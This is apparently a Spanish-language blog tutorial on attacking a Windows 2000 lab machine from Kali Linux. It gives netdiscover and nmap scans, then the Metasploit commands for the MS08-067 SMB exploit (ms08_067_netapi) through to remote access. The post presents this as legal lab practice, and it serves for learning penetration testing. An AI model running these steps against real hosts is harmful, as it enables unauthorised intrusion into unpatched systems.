HAGAMOS PENTESTING CON WINDOWS 2000-2003-XP DESDE KALI LINUX

Me estoy armando muchos sistemas que vinieron en los laboratorio de Offsensive Security, obviamente esto es legal.



Te encuentras un windows 2000 ¿cómo lo puedes explotar? Eso lo vamos a ver.
Antes de empezar quiero compartirte la iso de windows 2000 para que también hagas tu propia prueba.
Link windows 2000 Here
¿Cómo empezar analizarlo?
Obviamente estamos en una red conectados y vamos a buscar a nuestra victima
netdiscover -i wlan0 -r 192.168.1.0/24
Recuerda según la IP lo puedes hacer ejemplo si la IP es 10.11.1.0/24
Ahora vamos a analizar sus puertos
nmap -sV -sC 192.168.1.7
Perfecto Tenemos más información


Ahora vamos a usar NESSUS, FARADAY O INTENTEMOS USAR OPENSOURCE.

Pero me llamo la atención smb
MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)
Verificamos que tenemos el puerto 445 para atacarlo.
nmap --script smb-vuln-ms08-067.nse -p445 192.168.1.7


Ahora vamos a abrir nuestro terminal y vamos a correr el meterpreter
service postgresql start
msfconsole -q
search smb
Ahora vamos a comprobar la versión y que sistema corre.
use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.7
set THREADS 10
exploit

Ahora hemos comprobado el sistema que usa. Ahora ataquemos!!
search MS08-067
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.7
show targets
Ahora colocamos el target, recuerda que la target es el sistema que sacamos en la versión anteriormente y el RHOST es la IP de tu victima y LHOST es la IP tuya.
set target 1
exploit
Ahora tenemos acceso a windows 2000 explotado espero haberte ayudado y aprendido un poco sobre explotaciones. Seguiré escribiendo de diferente sistema.
No te olvides en compartirlo.

No hay comentarios.:

Publicar un comentario

@creadpag